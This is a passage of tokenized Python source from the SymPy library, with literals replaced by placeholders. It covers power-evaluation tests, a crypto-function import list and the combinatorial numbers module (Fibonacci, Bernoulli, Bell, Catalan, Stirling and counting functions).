<NUM_LIT:2> , <NUM_LIT:3> ) == <NUM_LIT:16> <EOL> assert <NUM_LIT> / sqrt ( <NUM_LIT:64> ) == <NUM_LIT:3> <EOL> assert ( - <NUM_LIT> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) == <NUM_LIT:3> * ( - <NUM_LIT:1> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> assert ( cos ( <NUM_LIT:2> ) / tan ( <NUM_LIT:2> ) ) ** <NUM_LIT:2> == ( cos ( <NUM_LIT:2> ) / tan ( <NUM_LIT:2> ) ) ** <NUM_LIT:2> <EOL> @ XFAIL <EOL> def test_pow_eval_X1 ( ) : <EOL> assert ( - <NUM_LIT:1> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) == Rational ( <NUM_LIT:1> , <NUM_LIT:2> ) + Rational ( <NUM_LIT:1> , <NUM_LIT:2> ) * I * sqrt ( <NUM_LIT:3> ) <EOL> def test_mulpow_eval ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> assert sqrt ( <NUM_LIT:50> ) / ( sqrt ( <NUM_LIT:2> ) * x ) == <NUM_LIT:5> / x <EOL> assert sqrt ( <NUM_LIT> ) / sqrt ( <NUM_LIT:3> ) == <NUM_LIT:3> <EOL> def test_evalpow_bug ( ) : <EOL> x = Symbol ( "<STR_LIT:x>" ) <EOL> assert <NUM_LIT:1> / ( <NUM_LIT:1> / x ) == x <EOL> assert <NUM_LIT:1> / ( - <NUM_LIT:1> / x ) == - x <EOL> def test_symbol_expand ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> y = Symbol ( '<STR_LIT:y>' ) <EOL> f = x ** <NUM_LIT:4> * y ** <NUM_LIT:4> <EOL> assert f == x ** <NUM_LIT:4> * y ** <NUM_LIT:4> <EOL> assert f == f . expand ( ) <EOL> g = ( x * y ) ** <NUM_LIT:4> <EOL> assert g == f <EOL> assert g . expand ( ) == f <EOL> assert g . expand ( ) == g . expand ( ) . expand ( ) <EOL> def test_function ( ) : <EOL> f = Function ( '<STR_LIT:f>' ) <EOL> l , x = map ( Symbol , '<STR_LIT>' ) <EOL> assert exp ( l ( x ) ) * l ( x ) / exp ( l ( x ) ) == l ( x ) <EOL> assert exp ( f ( x ) ) * f ( x ) / exp ( f ( x ) ) == f ( x ) </s>
<s> from sympy . crypto . crypto import ( cycle_list , <EOL> encipher_shift , encipher_affine , encipher_substitution , <EOL> check_and_join , encipher_vigenere , decipher_vigenere , bifid5_square , <EOL> bifid6_square , encipher_hill , decipher_hill , <EOL> encipher_bifid5 , encipher_bifid6 , decipher_bifid5 , <EOL> decipher_bifid6 , encipher_kid_rsa , decipher_kid_rsa , <EOL> kid_rsa_private_key , kid_rsa_public_key , decipher_rsa , rsa_private_key , <EOL> rsa_public_key , encipher_rsa , lfsr_connection_polynomial , <EOL> lfsr_autocorrelation , lfsr_sequence , encode_morse , decode_morse , <EOL> elgamal_private_key , elgamal_public_key , decipher_elgamal , <EOL> encipher_elgamal , dh_private_key , dh_public_key , dh_shared_key , <EOL> padded_key , encipher_bifid , decipher_bifid , bifid_square , bifid5 , <EOL> bifid6 , bifid10 ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . core import S , Symbol , Rational , Integer , Add , Dummy <EOL> from sympy . core . compatibility import as_int , SYMPY_INTS , range <EOL> from sympy . core . cache import cacheit <EOL> from sympy . core . function import Function , expand_mul <EOL> from sympy . core . numbers import E , pi <EOL> from sympy . core . relational import LessThan , StrictGreaterThan <EOL> from sympy . functions . combinatorial . factorials import binomial , factorial <EOL> from sympy . functions . elementary . exponential import log <EOL> from sympy . functions . elementary . integers import floor <EOL> from sympy . functions . elementary . trigonometric import sin , cos , cot <EOL> from sympy . functions . elementary . miscellaneous import sqrt <EOL> from sympy . utilities . memoization import recurrence_memo <EOL> from mpmath import bernfrac , workprec <EOL> from mpmath . libmp import ifib as _ifib <EOL> def _product ( a , b ) : <EOL> p = <NUM_LIT:1> <EOL> for k in range ( a , b + <NUM_LIT:1> ) : <EOL> p *= k <EOL> return p <EOL> _sym = Symbol ( '<STR_LIT:x>' ) <EOL> _symbols = Function ( '<STR_LIT:x>' ) <EOL> class fibonacci ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ staticmethod <EOL> def _fib ( n ) : <EOL> return _ifib ( n ) <EOL> @ staticmethod <EOL> @ recurrence_memo ( [ None , S . One , _sym ] ) <EOL> def _fibpoly ( n , prev ) : <EOL> return ( prev [ - <NUM_LIT:2> ] + _sym * prev [ - <NUM_LIT:1> ] ) . expand ( ) <EOL> @ classmethod <EOL> def eval ( cls , n , sym = None ) : <EOL> if n is S . Infinity : <EOL> return S . Infinity <EOL> if n . is_Integer : <EOL> n = int ( n ) <EOL> if n < <NUM_LIT:0> : <EOL> return S . NegativeOne ** ( n + <NUM_LIT:1> ) * fibonacci ( - n ) <EOL> if sym is None : <EOL> return Integer ( cls . _fib ( n ) ) <EOL> else : <EOL> if n < <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return cls . _fibpoly ( n ) . subs ( _sym , sym ) <EOL> def _eval_rewrite_as_sqrt ( self , n ) : <EOL> return <NUM_LIT:2> ** ( - n ) * sqrt ( <NUM_LIT:5> ) * ( ( <NUM_LIT:1> + sqrt ( <NUM_LIT:5> ) ) ** n - ( - sqrt ( <NUM_LIT:5> ) + <NUM_LIT:1> ) ** n ) / <NUM_LIT:5> <EOL> class lucas ( Function ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , n ) : <EOL> if n is S . Infinity : <EOL> return S . Infinity <EOL> if n . is_Integer : <EOL> return fibonacci ( n + <NUM_LIT:1> ) + fibonacci ( n - <NUM_LIT:1> ) <EOL> def _eval_rewrite_as_sqrt ( self , n ) : <EOL> return <NUM_LIT:2> ** ( - n ) * ( ( <NUM_LIT:1> + sqrt ( <NUM_LIT:5> ) ) ** n + ( - sqrt ( <NUM_LIT:5> ) + <NUM_LIT:1> ) ** n ) <EOL> class bernoulli ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ staticmethod <EOL> def _calc_bernoulli ( n ) : <EOL> s = <NUM_LIT:0> <EOL> a = int ( binomial ( n + <NUM_LIT:3> , n - <NUM_LIT:6> ) ) <EOL> for j in range ( <NUM_LIT:1> , n // <NUM_LIT:6> + <NUM_LIT:1> ) : <EOL> s += a * bernoulli ( n - <NUM_LIT:6> * j ) <EOL> a *= _product ( n - <NUM_LIT:6> - <NUM_LIT:6> * j + <NUM_LIT:1> , n - <NUM_LIT:6> * j ) <EOL> a //= _product ( <NUM_LIT:6> * j + <NUM_LIT:4> , <NUM_LIT:6> * j + <NUM_LIT:9> ) <EOL> if n % <NUM_LIT:6> == <NUM_LIT:4> : <EOL> s = - Rational ( n + <NUM_LIT:3> , <NUM_LIT:6> ) - s <EOL> else : <EOL> s = Rational ( n + <NUM_LIT:3> , <NUM_LIT:3> ) - s <EOL> return s / binomial ( n + <NUM_LIT:3> , n ) <EOL> _cache = { <NUM_LIT:0> : S . One , <NUM_LIT:2> : Rational ( <NUM_LIT:1> , <NUM_LIT:6> ) , <NUM_LIT:4> : Rational ( - <NUM_LIT:1> , <NUM_LIT:30> ) } <EOL> _highest = { <NUM_LIT:0> : <NUM_LIT:0> , <NUM_LIT:2> : <NUM_LIT:2> , <NUM_LIT:4> : <NUM_LIT:4> } <EOL> @ classmethod <EOL> def eval ( cls , n , sym = None ) : <EOL> if n . is_Number : <EOL> if n . is_Integer and n . is_nonnegative : <EOL> if n is S . Zero : <EOL> return S . One <EOL> elif n is S . One : <EOL> if sym is None : <EOL> return - S . Half <EOL> else : <EOL> return sym - S . Half <EOL> elif sym is None : <EOL> if n . is_odd : <EOL> return S . Zero <EOL> n = int ( n ) <EOL> if n > <NUM_LIT> : <EOL> p , q = bernfrac ( n ) <EOL> return Rational ( int ( p ) , int ( q ) ) <EOL> case = n % <NUM_LIT:6> <EOL> highest_cached = cls . _highest [ case ] <EOL> if n <= highest_cached : <EOL> return cls . _cache [ n ] <EOL> for i in range ( highest_cached + <NUM_LIT:6> , n + <NUM_LIT:6> , <NUM_LIT:6> ) : <EOL> b = cls . _calc_bernoulli ( i ) <EOL> cls . _cache [ i ] = b <EOL> cls . _highest [ case ] = i <EOL> return b <EOL> else : <EOL> n , result = int ( n ) , [ ] <EOL> for k in range ( n + <NUM_LIT:1> ) : <EOL> result . append ( binomial ( n , k ) * cls ( k ) * sym ** ( n - k ) ) <EOL> return Add ( * result ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if sym is None : <EOL> if n . is_odd and ( n - <NUM_LIT:1> ) . is_positive : <EOL> return S . Zero <EOL> class bell ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ staticmethod <EOL> @ recurrence_memo ( [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> def _bell ( n , prev ) : <EOL> s = <NUM_LIT:1> <EOL> a = <NUM_LIT:1> <EOL> for k in range ( <NUM_LIT:1> , n ) : <EOL> a = a * ( n - k ) // k <EOL> s += a * prev [ k ] <EOL> return s <EOL> @ staticmethod <EOL> @ recurrence_memo ( [ S . One , _sym ] ) <EOL> def _bell_poly ( n , prev ) : <EOL> s = <NUM_LIT:1> <EOL> a = <NUM_LIT:1> <EOL> for k in range ( <NUM_LIT:2> , n + <NUM_LIT:1> ) : <EOL> a = a * ( n - k + <NUM_LIT:1> ) // ( k - <NUM_LIT:1> ) <EOL> s += a * prev [ k - <NUM_LIT:1> ] <EOL> return expand_mul ( _sym * s ) <EOL> @ staticmethod <EOL> def _bell_incomplete_poly ( n , k , symbols ) : <EOL> r"""<STR_LIT>""" <EOL> if ( n == <NUM_LIT:0> ) and ( k == <NUM_LIT:0> ) : <EOL> return S . One <EOL> elif ( n == <NUM_LIT:0> ) or ( k == <NUM_LIT:0> ) : <EOL> return S . Zero <EOL> s = S . Zero <EOL> a = S . One <EOL> for m in range ( <NUM_LIT:1> , n - k + <NUM_LIT:2> ) : <EOL> s += a * bell . _bell_incomplete_poly ( <EOL> n - m , k - <NUM_LIT:1> , symbols ) * symbols [ m - <NUM_LIT:1> ] <EOL> a = a * ( n - m ) / m <EOL> return expand_mul ( s ) <EOL> @ classmethod <EOL> def eval ( cls , n , k_sym = None , symbols = None ) : <EOL> if n . is_Integer and n . is_nonnegative : <EOL> if k_sym is None : <EOL> return Integer ( cls . _bell ( int ( n ) ) ) <EOL> elif symbols is None : <EOL> return cls . _bell_poly ( int ( n ) ) . subs ( _sym , k_sym ) <EOL> else : <EOL> r = cls . _bell_incomplete_poly ( int ( n ) , int ( k_sym ) , symbols ) <EOL> return r <EOL> def _eval_rewrite_as_Sum ( self , n , k_sym = None , symbols = None ) : <EOL> from sympy import Sum <EOL> if ( k_sym is not None ) or ( symbols is not None ) : <EOL> return self <EOL> if not n . is_nonnegative : <EOL> return self <EOL> k = Dummy ( '<STR_LIT:k>' , integer = True , nonnegative = True ) <EOL> return <NUM_LIT:1> / E * Sum ( k ** n / factorial ( k ) , ( k , <NUM_LIT:0> , S . Infinity ) ) <EOL> class harmonic ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> _functions = { } <EOL> @ classmethod <EOL> def eval ( cls , n , m = None ) : <EOL> from sympy import zeta <EOL> if m is S . One : <EOL> return cls ( n ) <EOL> if m is None : <EOL> m = S . One <EOL> if m . is_zero : <EOL> return n <EOL> if n is S . Infinity and m . is_Number : <EOL> if m . is_negative : <EOL> return S . NaN <EOL> elif LessThan ( m , S . One ) : <EOL> return S . Infinity <EOL> elif StrictGreaterThan ( m , S . One ) : <EOL> return zeta ( m ) <EOL> else : <EOL> return cls <EOL> if n . is_Integer and n . is_nonnegative and m . is_Integer : <EOL> if n == <NUM_LIT:0> : <EOL> return S . Zero <EOL> if not m in cls . _functions : <EOL> @ recurrence_memo ( [ <NUM_LIT:0> ] ) <EOL> def f ( n , prev ) : <EOL> return prev [ - <NUM_LIT:1> ] + S . One / n ** m <EOL> cls . _functions [ m ] = f <EOL> return cls . _functions [ m ] ( int ( n ) ) <EOL> def _eval_rewrite_as_polygamma ( self , n , m = <NUM_LIT:1> ) : <EOL> from sympy . functions . special . gamma_functions import polygamma <EOL> return S . NegativeOne ** m / factorial ( m - <NUM_LIT:1> ) * ( polygamma ( m - <NUM_LIT:1> , <NUM_LIT:1> ) - polygamma ( m - <NUM_LIT:1> , n + <NUM_LIT:1> ) ) <EOL> def _eval_rewrite_as_digamma ( self , n , m = <NUM_LIT:1> ) : <EOL> from sympy . functions . special . gamma_functions import polygamma <EOL> return self . rewrite ( polygamma ) <EOL> def _eval_rewrite_as_trigamma ( self , n , m = <NUM_LIT:1> ) : <EOL> from sympy . functions . special . gamma_functions import polygamma <EOL> return self . rewrite ( polygamma ) <EOL> def _eval_rewrite_as_Sum ( self , n , m = None ) : <EOL> from sympy import Sum <EOL> k = Dummy ( "<STR_LIT:k>" , integer = True ) <EOL> if m is None : <EOL> m = S . One <EOL> return Sum ( k ** ( - m ) , ( k , <NUM_LIT:1> , n ) ) <EOL> def _eval_expand_func ( self , ** hints ) : <EOL> from sympy import Sum <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> m = self . args [ <NUM_LIT:1> ] if len ( self . args ) == <NUM_LIT:2> else <NUM_LIT:1> <EOL> if m == S . One : <EOL> if n . is_Add : <EOL> off = n . args [ <NUM_LIT:0> ] <EOL> nnew = n - off <EOL> if off . is_Integer and off . is_positive : <EOL> result = [ S . One / ( nnew + i ) for i in range ( off , <NUM_LIT:0> , - <NUM_LIT:1> ) ] + [ harmonic ( nnew ) ] <EOL> return Add ( * result ) <EOL> elif off . is_Integer and off . is_negative : <EOL> result = [ - S . One / ( nnew + i ) for i in range ( <NUM_LIT:0> , off , - <NUM_LIT:1> ) ] + [ harmonic ( nnew ) ] <EOL> return Add ( * result ) <EOL> if n . is_Rational : <EOL> p , q = n . as_numer_denom ( ) <EOL> u = p // q <EOL> p = p - u * q <EOL> if u . is_nonnegative and p . is_positive and q . is_positive and p < q : <EOL> k = Dummy ( "<STR_LIT:k>" ) <EOL> t1 = q * Sum ( <NUM_LIT:1> / ( q * k + p ) , ( k , <NUM_LIT:0> , u ) ) <EOL> t2 = <NUM_LIT:2> * Sum ( cos ( ( <NUM_LIT:2> * pi * p * k ) / S ( q ) ) * <EOL> log ( sin ( ( pi * k ) / S ( q ) ) ) , <EOL> ( k , <NUM_LIT:1> , floor ( ( q - <NUM_LIT:1> ) / S ( <NUM_LIT:2> ) ) ) ) <EOL> t3 = ( pi / <NUM_LIT:2> ) * cot ( ( pi * p ) / q ) + log ( <NUM_LIT:2> * q ) <EOL> return t1 + t2 - t3 <EOL> return self <EOL> def _eval_rewrite_as_tractable ( self , n , m = <NUM_LIT:1> ) : <EOL> from sympy import polygamma <EOL> return self . rewrite ( polygamma ) . rewrite ( "<STR_LIT>" , deep = True ) <EOL> def _eval_evalf ( self , prec ) : <EOL> from sympy import polygamma <EOL> if all ( i . is_number for i in self . args ) : <EOL> return self . rewrite ( polygamma ) . _eval_evalf ( prec ) <EOL> class euler ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , m ) : <EOL> if m . is_odd : <EOL> return S . Zero <EOL> if m . is_Integer and m . is_nonnegative : <EOL> from mpmath import mp <EOL> m = m . _to_mpmath ( mp . prec ) <EOL> res = mp . eulernum ( m , exact = True ) <EOL> return Integer ( res ) <EOL> def _eval_rewrite_as_Sum ( self , arg ) : <EOL> from sympy import Sum <EOL> if arg . is_even : <EOL> k = Dummy ( "<STR_LIT:k>" , integer = True ) <EOL> j = Dummy ( "<STR_LIT>" , integer = True ) <EOL> n = self . args [ <NUM_LIT:0> ] / <NUM_LIT:2> <EOL> Em = ( S . ImaginaryUnit * Sum ( Sum ( binomial ( k , j ) * ( ( - <NUM_LIT:1> ) ** j * ( k - <NUM_LIT:2> * j ) ** ( <NUM_LIT:2> * n + <NUM_LIT:1> ) ) / <EOL> ( <NUM_LIT:2> ** k * S . ImaginaryUnit ** k * k ) , ( j , <NUM_LIT:0> , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:2> * n + <NUM_LIT:1> ) ) ) <EOL> return Em <EOL> def _eval_evalf ( self , prec ) : <EOL> m = self . args [ <NUM_LIT:0> ] <EOL> if m . is_Integer and m . is_nonnegative : <EOL> from mpmath import mp <EOL> from sympy import Expr <EOL> m = m . _to_mpmath ( prec ) <EOL> with workprec ( prec ) : <EOL> res = mp . eulernum ( m ) <EOL> return Expr . _from_mpmath ( res , prec ) <EOL> class catalan ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , n ) : <EOL> from sympy import gamma <EOL> if ( n . is_Integer and n . is_nonnegative ) or ( n . is_noninteger and n . is_negative ) : <EOL> return <NUM_LIT:4> ** n * gamma ( n + S . Half ) / ( gamma ( S . Half ) * gamma ( n + <NUM_LIT:2> ) ) <EOL> if ( n . is_integer and n . is_negative ) : <EOL> if ( n + <NUM_LIT:1> ) . is_negative : <EOL> return S . Zero <EOL> if ( n + <NUM_LIT:1> ) . is_zero : <EOL> return - S . Half <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> from sympy import polygamma , log <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> return catalan ( n ) * ( polygamma ( <NUM_LIT:0> , n + Rational ( <NUM_LIT:1> , <NUM_LIT:2> ) ) - polygamma ( <NUM_LIT:0> , n + <NUM_LIT:2> ) + log ( <NUM_LIT:4> ) ) <EOL> def _eval_rewrite_as_binomial ( self , n ) : <EOL> return binomial ( <NUM_LIT:2> * n , n ) / ( n + <NUM_LIT:1> ) <EOL> def _eval_rewrite_as_factorial ( self , n ) : <EOL> return factorial ( <NUM_LIT:2> * n ) / ( factorial ( n + <NUM_LIT:1> ) * factorial ( n ) ) <EOL> def _eval_rewrite_as_gamma ( self , n ) : <EOL> from sympy import gamma <EOL> return <NUM_LIT:4> ** n * gamma ( n + S . Half ) / ( gamma ( S . Half ) * gamma ( n + <NUM_LIT:2> ) ) <EOL> def _eval_rewrite_as_hyper ( self , n ) : <EOL> from sympy import hyper <EOL> return hyper ( [ <NUM_LIT:1> - n , - n ] , [ <NUM_LIT:2> ] , <NUM_LIT:1> ) <EOL> def _eval_rewrite_as_Product ( self , n ) : <EOL> from sympy import Product <EOL> if not ( n . is_integer and n . is_nonnegative ) : <EOL> return self <EOL> k = Dummy ( '<STR_LIT:k>' , integer = True , positive = True ) <EOL> return Product ( ( n + k ) / k , ( k , <NUM_LIT:2> , n ) ) <EOL> def _eval_evalf ( self , prec ) : <EOL> from sympy import gamma <EOL> if self . args [ <NUM_LIT:0> ] . is_number : <EOL> return self . rewrite ( gamma ) . _eval_evalf ( prec ) <EOL> class genocchi ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , n ) : <EOL> if n . is_Number : <EOL> if ( not n . is_Integer ) or n . is_nonpositive : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:2> * ( <NUM_LIT:1> - S ( <NUM_LIT:2> ) ** n ) * bernoulli ( n ) <EOL> if n . is_odd and ( n - <NUM_LIT:1> ) . is_positive : <EOL> return S . Zero <EOL> if ( n - <NUM_LIT:1> ) . is_zero : <EOL> return S . One <EOL> def _eval_rewrite_as_bernoulli ( self , n ) : <EOL> if n . is_integer and n . is_nonnegative : <EOL> return ( <NUM_LIT:1> - S ( <NUM_LIT:2> ) ** n ) * bernoulli ( n ) * <NUM_LIT:2> <EOL> def _eval_is_integer ( self ) : <EOL> if self . args [ <NUM_LIT:0> ] . is_integer and self . args [ <NUM_LIT:0> ] . is_positive : <EOL> return True <EOL> def _eval_is_negative ( self ) : <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> if n . is_integer and n . is_positive : <EOL> if n . is_odd : <EOL> return False <EOL> return ( n / <NUM_LIT:2> ) . is_odd <EOL> def _eval_is_positive ( self ) : <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> if n . is_integer and n . is_positive : <EOL> if n . is_odd : <EOL> return fuzzy_not ( ( n - <NUM_LIT:1> ) . is_positive ) <EOL> return ( n / <NUM_LIT:2> ) . is_even <EOL> def _eval_is_even ( self ) : <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> if n . is_integer and n . is_positive : <EOL> if n . is_even : <EOL> return False <EOL> return ( n - <NUM_LIT:1> ) . is_positive <EOL> def _eval_is_odd ( self ) : <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> if n . is_integer and n . is_positive : <EOL> if n . is_even : <EOL> return True <EOL> return fuzzy_not ( ( n - <NUM_LIT:1> ) . is_positive ) <EOL> def _eval_is_prime ( self ) : <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> return ( n - <NUM_LIT:8> ) . is_zero <EOL> class _MultisetHistogram ( tuple ) : <EOL> pass <EOL> _N = - <NUM_LIT:1> <EOL> _ITEMS = - <NUM_LIT:2> <EOL> _M = slice ( None , _ITEMS ) <EOL> def _multiset_histogram ( n ) : <EOL> """<STR_LIT>""" <EOL> if type ( n ) is dict : <EOL> if not all ( isinstance ( v , int ) and v >= <NUM_LIT:0> for v in n . values ( ) ) : <EOL> raise ValueError <EOL> tot = sum ( n . values ( ) ) <EOL> items = sum ( <NUM_LIT:1> for k in n if n [ k ] > <NUM_LIT:0> ) <EOL> return _MultisetHistogram ( [ n [ k ] for k in n if n [ k ] > <NUM_LIT:0> ] + [ items , tot ] ) <EOL> else : <EOL> n = list ( n ) <EOL> s = set ( n ) <EOL> if len ( s ) == len ( n ) : <EOL> n = [ <NUM_LIT:1> ] * len ( n ) <EOL> n . extend ( [ len ( n ) , len ( n ) ] ) <EOL> return _MultisetHistogram ( n ) <EOL> m = dict ( zip ( s , range ( len ( s ) ) ) ) <EOL> d = dict ( zip ( range ( len ( s ) ) , [ <NUM_LIT:0> ] * len ( s ) ) ) <EOL> for i in n : <EOL> d [ m [ i ] ] += <NUM_LIT:1> <EOL> return _multiset_histogram ( d ) <EOL> def nP ( n , k = None , replacement = False ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> n = as_int ( n ) <EOL> except ValueError : <EOL> return Integer ( _nP ( _multiset_histogram ( n ) , k , replacement ) ) <EOL> return Integer ( _nP ( n , k , replacement ) ) <EOL> @ cacheit <EOL> def _nP ( n , k = None , replacement = False ) : <EOL> from sympy . functions . combinatorial . factorials import factorial <EOL> from sympy . core . mul import prod <EOL> if k == <NUM_LIT:0> : <EOL> return <NUM_LIT:1> <EOL> if isinstance ( n , SYMPY_INTS ) : <EOL> if k is None : <EOL> return sum ( _nP ( n , i , replacement ) for i in range ( n + <NUM_LIT:1> ) ) <EOL> elif replacement : <EOL> return n ** k <EOL> elif k > n : <EOL> return <NUM_LIT:0> <EOL> elif k == n : <EOL> return factorial ( k ) <EOL> elif k == <NUM_LIT:1> : <EOL> return n <EOL> else : <EOL> return _product ( n - k + <NUM_LIT:1> , n ) <EOL> elif isinstance ( n , _MultisetHistogram ) : <EOL> if k is None : <EOL> return sum ( _nP ( n , i , replacement ) for i in range ( n [ _N ] + <NUM_LIT:1> ) ) <EOL> elif replacement : <EOL> return n [ _ITEMS ] ** k <EOL> elif k == n [ _N ] : <EOL> return factorial ( k ) / prod ( [ factorial ( i ) for i in n [ _M ] if i > <NUM_LIT:1> ] ) <EOL> elif k > n [ _N ] : <EOL> return <NUM_LIT:0> <EOL> elif k == <NUM_LIT:1> : <EOL> return n [ _ITEMS ] <EOL> else : <EOL> tot = <NUM_LIT:0> <EOL> n = list ( n ) <EOL> for i in range ( len ( n [ _M ] ) ) : <EOL> if not n [ i ] : <EOL> continue <EOL> n [ _N ] -= <NUM_LIT:1> <EOL> if n [ i ] == <NUM_LIT:1> : <EOL> n [ i ] = <NUM_LIT:0> <EOL> n [ _ITEMS ] -= <NUM_LIT:1> <EOL> tot += _nP ( _MultisetHistogram ( n ) , k - <NUM_LIT:1> ) <EOL> n [ _ITEMS ] += <NUM_LIT:1> <EOL> n [ i ] = <NUM_LIT:1> <EOL> else : <EOL> n [ i ] -= <NUM_LIT:1> <EOL> tot += _nP ( _MultisetHistogram ( n ) , k - <NUM_LIT:1> ) <EOL> n [ i ] += <NUM_LIT:1> <EOL> n [ _N ] += <NUM_LIT:1> <EOL> return tot <EOL> @ cacheit <EOL> def _AOP_product ( n ) : <EOL> """<STR_LIT>""" <EOL> from collections import defaultdict <EOL> n = list ( n ) <EOL> ord = sum ( n ) <EOL> need = ( ord + <NUM_LIT:2> ) // <NUM_LIT:2> <EOL> rv = [ <NUM_LIT:1> ] * ( n . pop ( ) + <NUM_LIT:1> ) <EOL> rv . extend ( [ <NUM_LIT:0> ] * ( need - len ( rv ) ) ) <EOL> rv = rv [ : need ] <EOL> while n : <EOL> ni = n . pop ( ) <EOL> N = ni + <NUM_LIT:1> <EOL> was = rv [ : ] <EOL> for i in range ( <NUM_LIT:1> , min ( N , len ( rv ) ) ) : <EOL> rv [ i ] += rv [ i - <NUM_LIT:1> ] <EOL> for i in range ( N , need ) : <EOL> rv [ i ] += rv [ i - <NUM_LIT:1> ] - was [ i - N ] <EOL> rev = list ( reversed ( rv ) ) <EOL> if ord % <NUM_LIT:2> : <EOL> rv = rv + rev <EOL> else : <EOL> rv [ - <NUM_LIT:1> : ] = rev <EOL> d = defaultdict ( int ) <EOL> for i in range ( len ( rv ) ) : <EOL> d [ i ] = rv [ i ] <EOL> return d <EOL> def nC ( n , k = None , replacement = False ) : <EOL> """<STR_LIT>""" <EOL> from sympy . functions . combinatorial . factorials import binomial <EOL> from sympy . core . mul import prod <EOL> if isinstance ( n , SYMPY_INTS ) : <EOL> if k is None : <EOL> if not replacement : <EOL> return <NUM_LIT:2> ** n <EOL> return sum ( nC ( n , i , replacement ) for i in range ( n + <NUM_LIT:1> ) ) <EOL> if k < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if replacement : <EOL> return binomial ( n + k - <NUM_LIT:1> , k ) <EOL> return binomial ( n , k ) <EOL> if isinstance ( n , _MultisetHistogram ) : <EOL> N = n [ _N ] <EOL> if k is None : <EOL> if not replacement : <EOL> return prod ( m + <NUM_LIT:1> for m in n [ _M ] ) <EOL> return sum ( nC ( n , i , replacement ) for i in range ( N + <NUM_LIT:1> ) ) <EOL> elif replacement : <EOL> return nC ( n [ _ITEMS ] , k , replacement ) <EOL> elif k in ( <NUM_LIT:1> , N - <NUM_LIT:1> ) : <EOL> return n [ _ITEMS ] <EOL> elif k in ( <NUM_LIT:0> , N ) : <EOL> return <NUM_LIT:1> <EOL> return _AOP_product ( tuple ( n [ _M ] ) ) [ k ] <EOL> else : <EOL> return nC ( _multiset_histogram ( n ) , k , replacement ) <EOL> @ cacheit <EOL> def _stirling1 ( n , k ) : <EOL> if n == k == <NUM_LIT:0> : <EOL> return S . One <EOL> if <NUM_LIT:0> in ( n , k ) : <EOL> return S . Zero <EOL> n1 = n - <NUM_LIT:1> <EOL> if n == k : <EOL> return S . One <EOL> elif k == <NUM_LIT:1> : <EOL> return factorial ( n1 ) <EOL> elif k == n1 : <EOL> return binomial ( n , <NUM_LIT:2> ) <EOL> elif k == n - <NUM_LIT:2> : <EOL> return ( <NUM_LIT:3> * n - <NUM_LIT:1> ) * binomial ( n , <NUM_LIT:3> ) / <NUM_LIT:4> <EOL> elif k == n - <NUM_LIT:3> : <EOL> return binomial ( n , <NUM_LIT:2> ) * binomial ( n , <NUM_LIT:4> ) <EOL> return n1 * _stirling1 ( n1 , k ) + _stirling1 ( n1 , k - <NUM_LIT:1> ) <EOL> @ cacheit <EOL> def _stirling2 ( n , k ) : <EOL> if n == k == <NUM_LIT:0> : <EOL> return S . One <EOL> if <NUM_LIT:0> in ( n , k ) : <EOL> return S . Zero <EOL> n1 = n - <NUM_LIT:1> <EOL> if k == n1 : <EOL> return binomial ( n , <NUM_LIT:2> ) <EOL> elif k == <NUM_LIT:2> : <EOL> return <NUM_LIT:2> ** n1 - <NUM_LIT:1> <EOL> return k * _stirling2 ( n1 , k ) + _stirling2 ( n1 , k - <NUM_LIT:1> ) <EOL> def stirling ( n , k , d = None , kind = <NUM_LIT:2> , signed = False ) : <EOL> """<STR_LIT>""" <EOL> n = as_int ( n ) <EOL> k = as_int ( k ) <EOL> if n < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if k > n : <EOL> return S . Zero <EOL> if d : <EOL> return _stirling2 ( n - d + <NUM_LIT:1> , k - d + <NUM_LIT:1> ) <EOL> elif signed : <EOL> return ( - <NUM_LIT:1> ) ** ( n - k ) * _stirling1 ( n , k ) <EOL> if kind == <NUM_LIT:1> : <EOL> return _stirling1 ( n , k ) <EOL> elif kind == <NUM_LIT:2> : <EOL> return _stirling2 ( n , k ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % k ) <EOL> @ cacheit <EOL> def _nT ( n , k ) : <EOL> """<STR_LIT>""" <EOL> if k == <NUM_LIT:0> : <EOL> return <NUM_LIT:1> if k == n else <NUM_LIT:0> <EOL> return sum ( _nT ( n - k , j ) for j in range ( min ( k , n - k ) + <NUM_LIT:1> ) ) <EOL> def nT ( n , k = None ) : <EOL> """<STR_LIT>""" <EOL> from sympy . utilities . enumerative import MultisetPartitionTraverser <EOL> if isinstance ( n , SYMPY_INTS ) : <EOL> if k is None : <EOL> return sum ( _nT ( n , k ) for k in range ( <NUM_LIT:1> , n + <NUM_LIT:1> ) ) <EOL> return _nT ( n 